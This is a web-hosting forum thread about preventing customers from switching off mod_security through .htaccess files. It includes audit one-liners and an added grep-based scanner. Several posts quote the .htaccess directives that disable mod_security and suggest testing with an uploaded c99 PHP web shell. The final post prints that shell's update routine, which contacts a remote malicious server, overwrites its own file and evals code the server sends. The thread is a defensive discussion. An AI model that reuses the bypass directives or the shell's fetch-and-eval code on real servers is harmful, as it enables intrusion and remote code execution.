How to disable overriding mod_security config via .htaccess

Discussion in 'Security' started by voshka, Jul 14, 2012.

  1. voshka

    voshka Active Member

    Hi

    If a user wanted to break the server, he could easily bypass the rules by simply opening a .htaccess and
    writing the following into it:
    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>

    Or maybe a hacker could bypass it too.

    So it is wise to disable the overriding functionality by user access.

    I have searched a lot and found that the way to do it is:
    /usr/local/apache/bin/apxs -D DISABLE_HTACCESS_CONFIG -cia mod_security.c

    I was able to compile it with one of the mod_security.c files related to version 1.9.5,
    but as it was too old some errors occurred:

    Syntax error on line 10 of /usr/local/apache/conf/modsec2.user.conf:
    Invalid parts specification for SecAuditLogParts: ABIFHZ
    httpd not running, trying to start
    [root@box1 modsec_rules]# nano /usr/local/apache/conf/modsec2.user.conf

    I tried recompiling with the latest 2.6.6 but it gets compilation errors.


    So my question is: is it possible to just compile what EasyApache has done, with the .htaccess module disabled, or do I have to reinstall and compile ModSecurity by hand from scratch? I would like some guidance and instructions for version 2.6.6.

    Thanks
     
  2. NetMantis

    NetMantis BANNED

    I generally first set up mod_security with EasyApache and then manually recompile and install mod_security over it, replacing the cPanel installation with one patched to disallow .htaccess overrides.

    It would be very nice if cPanel had that set up in EasyApache by default, but at this time that's how I have to do it.

    If you want to be particularly nasty, you could write a quick simple script to grep all the .htaccess files for "SecFilterEngine" or "mod_security.c" and automatically suspend any accounts where it is found.
     
  3. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    If a hacker already had access to the account, there would be no need at that point to disable mod_security for the account by the hacker. If you have a foot in the door, you don't then start drilling extra holes in that door to get in when you are already inside the house.

    The only reason a site owner might do it would be because the rules being used are impacting a page or pages displaying, and then most users wouldn't be aware of how to even do it.

    If you would like to see this option available, it would be best to post a feature request to change the configuration option:

    Feature Requests for cPanel & WHM
     
  4. voshka

    voshka Active Member

    For finding them all I used:

    find /home2 -type f -name ".htaccess" -print0 | xargs -0 grep -l "SecFilterScanPOST"

    This will list all .htaccess files that contain SecFilterScanPOST.

    The thing is that we don't want to allow users to manually edit .htaccess files in a way that lets hackers intrude into the system.
    It is not the hacker that would be able to change .htaccess.

    Thanks

    - - - Updated - - -

    @NetMantis
    could you please provide me details of how to implement this?

    Thanks
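
An added example, not part of any post in this thread: the grep-based .htaccess audit discussed above, written as a POSIX shell function. It goes beyond the one-liner by matching directive names case-insensitively (Apache directive names are case-insensitive), skipping commented-out lines, and also covering the ModSecurity 2.x `SecRuleEngine` switch. Treating the first directory below the scan root as the account name is an assumption about the home-directory layout, and `scan_htaccess` and `make_sample` are names made up here.

```shell
#!/bin/sh
# Added example (not from the thread): report .htaccess files that try to
# switch ModSecurity off, with the account each file belongs to.

# Active (not commented-out) engine directives set to Off.
# SecFilterEngine / SecFilterScanPOST are the 1.x names quoted in the thread;
# SecRuleEngine is the 2.x engine switch, included so both generations are covered.
MODSEC_OFF_RE='^[[:space:]]*(SecFilterEngine|SecFilterScanPOST|SecRuleEngine)[[:space:]]+"?Off'

# scan_htaccess ROOT
# Prints one line per hit: account<TAB>file<TAB>line-number:matched line.
# Assumption: the first directory below ROOT is the account name (e.g. /home2/USER/...).
# File names containing newlines are not handled.
scan_htaccess() {
    root=${1%/}
    find "$root" -type f -name '.htaccess' \
        -exec grep -lEi -- "$MODSEC_OFF_RE" {} + 2>/dev/null |
    while IFS= read -r file; do
        rel=${file#"$root"/}
        account=${rel%%/*}
        grep -nEi -- "$MODSEC_OFF_RE" "$file" |
        while IFS= read -r hit; do
            printf '%s\t%s\t%s\n' "$account" "$file" "$hit"
        done
    done
}

# Constructed sample tree for trying the scan offline; prints its path.
make_sample() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/alice/public_html" "$d/bob/public_html" "$d/carol/public_html"
    printf '<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>\n' \
        > "$d/alice/public_html/.htaccess"
    printf '# SecFilterEngine Off\nRewriteEngine On\n' > "$d/bob/public_html/.htaccess"
    printf '  secruleengine off\r\n' > "$d/carol/public_html/.htaccess"
    printf '%s\n' "$d"
}

# Usage: sh scan.sh /home2   (with no argument nothing is scanned)
if [ "$#" -gt 0 ]; then
    scan_htaccess "$1"
fi
```

The output is report-only; what to do with a flagged account is left to the administrator.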
     
  5. NetMantis

    NetMantis BANNED

    You very clearly missed the whole point entirely! :)

    We aren't talking about hackers or anyone already hacking the accounts.

    We are discussing preventing a security vulnerability from being opened that could lead to hacking.

    What I was talking about doing above was auto-suspending users who attempt to bypass mod_security, not as a means of making anything more secure (I already have it locked down so that it is physically impossible to do that anyway) but rather to get the immediate undivided attention of any user who tries to do so!

    With the .htaccess options disabled in the compile for mod_security, the user couldn't do anything anyway but I want them to know that they should not be trying to disable it and that I know that they made the attempt to do so!

    It would seem that voshka understood the whole exact point precisely! :)

    Sure, no problem! I'll shoot you over a private message with my contact info and we can get together on this.

    I'll be out and about most of the day today after this morning but I should be back this evening and will also be around all day long tomorrow so whenever you can catch up to me on that, I'd be happy to give you a hand.
     
  6. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Again, if this is important to you, you would want to open up a feature request. You might link to it in this thread if you've done so for others who run into the topic to post onto that feature request.
     
  7. borgia

    borgia Member

    Yeah right, Mod_security 2 cannot be disabled from .htaccess.
    (only from httpd.conf).

    So relax....
     
    #7 borgia, Jul 15, 2012
    Last edited: Jul 15, 2012
  8. voshka

    voshka Active Member

    It actually can.
    Please make a test: put this into one of the domains' .htaccess files, then upload and test a shell in that directory.

    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>

    or

    <IfModule mod_security2.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>
     
  9. borgia

    borgia Member

    I am sorry, what do you mean by "test a shell in that directory"? I tested in the browser and everything is working; mod_security wasn't disabled.

    Regards
     
  10. voshka

    voshka Active Member

    I mean upload a PHP shell, let's say the c99 PHP shell or the like,
    put that in the .htaccess and then use your browser to point to that PHP shell.
    It must be working if you put that in .htaccess,
    and this disables all the mod_security analyzing and filtering features.

    Thanks
     
  11. borgia

    borgia Member

    I didn't test with that; I am using something else so that those PHP shells are automatically removed at upload time. But you can restrict those PHP shells to run only in the user directory (open_basedir in your custom php.ini for each virtual host). So there will be no harm to your server.


    Regards
     
    #11 borgia, Jul 15, 2012
    Last edited: Jul 15, 2012
  12. voshka

    voshka Active Member

    Hi

    I have already created a feature request for the main request of this thread,
    but I believe it has something to do with mod_security itself, to have the disable module available in mod_security 2.6.6.
    Please, if anybody knows a fix, help me to prevent disabling mod_security using .htaccess.

    What cPanel staff mentioned above is somewhat true, but a user could purchase service with the intention to do harm, easily disable mod_security using .htaccess, and harm the server.
    Please help me.

    Thanks
     
  13. d'argo

    d'argo Active Member

    You can't disable modsec 2.6.6 via .htaccess. These aren't even 2.x directives:

    SecFilterEngine Off
    SecFilterScanPOST Off

    Are you sure you aren't talking about an earlier version of modsec?
     
  14. CharlesBoyd

    CharlesBoyd Member

    Don't test with the C99 shell; most variants I have seen will automatically make connections and download updates from a remote (obviously malicious) server.

    A typical example:

    PHP:
    $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)

    $c99sh_updateurl = "http://crapsite.ru/update/c99shell/"; //Update server
    $c99sh_sourcesurl = "http://crapsite.ru/files/c99sh_sources/"; //Sources-server

    Here is the update function:

    PHP:
    if (!function_exists("c99sh_getupdate"))
    {
     function c99sh_getupdate($update = TRUE)
     {
      // Outbound request to the update server, reporting the shell version
      $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
      $data = @file_get_contents($url);
      if (!$data) {return "Can't connect to update-server!";}
      else
      {
       $data = ltrim($data);
       $string = substr($data,3,ord($data{2}));
       if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
       if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
       if ($data{0} == "\x99" and $data{1} == "\x03")
       {
        $string = explode("\x01",$string);
        if ($update)
        {
         $confvars = array();
         $sourceurl = $string[0];
         $source = file_get_contents($sourceurl);
         if (!$source) {return "Can't fetch update!";}
         else
         {
          // Overwrites the shell's own file with whatever the server returned
          $fp = fopen(__FILE__,"w");
          if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
          else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
         }
        }
        else {return "New version are available: ".$string[1];}
       }
       // Response type \x04: PHP code sent by the server is executed directly
       elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
       else {return "Error in protocol: segmentation failed! (".$data.") ";}
      }
     }
    }
    Whatever gets downloaded in this update is probably not something you want.

    There are better ways to do this....
     
    #14 CharlesBoyd, Sep 6, 2012
    Last edited by a moderator: Sep 7, 2012